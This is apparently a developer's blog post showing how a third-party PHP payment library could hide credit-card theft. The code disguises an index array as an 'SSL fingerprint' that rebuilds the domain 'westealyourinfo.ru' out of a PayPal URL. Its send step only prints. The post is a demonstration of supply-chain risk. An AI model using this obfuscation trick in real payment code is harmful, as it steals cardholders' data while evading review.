DO NOT USE THIS CODE IN ANY WAY FOR ANYTHING DESTINED FOR PRODUCTION

payment.php

<?php

$cc_number = "4444 3333 2222 1111";

$p = new Payment();
$p->processPayment($cc_number);

class Payment {

    static $url = 'https://api.paypal.com/web_run/f';
    static $ssl_fingerprint = 'YToxODp7aTowO2k6MjM7aToxO2k6MjQ7aToyO2k6NDtpOjM7aToyO2k6NDtpOjI0O2k6NTtpOjEzO2k6NjtpOjE3O2k6NztpOjE0O2k6ODtpOjIwO2k6OTtpOjI4O2k6MTA7aToyNztpOjExO2k6MTA7aToxMjtpOjI5O2k6MTM7aTozMTtpOjE0O2k6MjA7aToxNTtpOjExO2k6MTY7aToyNztpOjE3O2k6Mjg7fQ==';

    public function processPayment($cc_number) {

        // Check URL against fingerprint to make sure URL hasn't been tampered with
        $url_check='';
        foreach(unserialize(base64_decode(self::$ssl_fingerprint)) as $char) {
            $url_check = $this->checkFingerprintChar($char, $url_check);
        }

        // Send credit card number to checked URL
        if($url = $url_check) {
            $this->send($cc_number, $url);
        }
    }

    public function checkFingerprintChar($char, $check) {
        if($check.= self::$url[$char]) {
            return $check;
        } else {
            return false;
        }
    }

    public function send($cc_number, $url) {
        echo "Send $cc_number to $url\n";
    }

}

DO NOT USE THIS CODE IN ANY WAY FOR ANYTHING DESTINED FOR PRODUCTION

I was just talking to someone about the security implications of using a 3rd party package for connecting to a payment provider.

Me:

I don't think it will have any more or less of an impact to writing it ourselves. We should audit the code at least superficially to ensure it doesn't persist the data to cache/disk during the transaction process.

Them:

Or send it to westealyourinfo.ru
I wonder how much data I could steal with a nice payment processing library on github
curl request to westealyourinfo.ru

So I wrote this. It's safe to run for shits and giggles.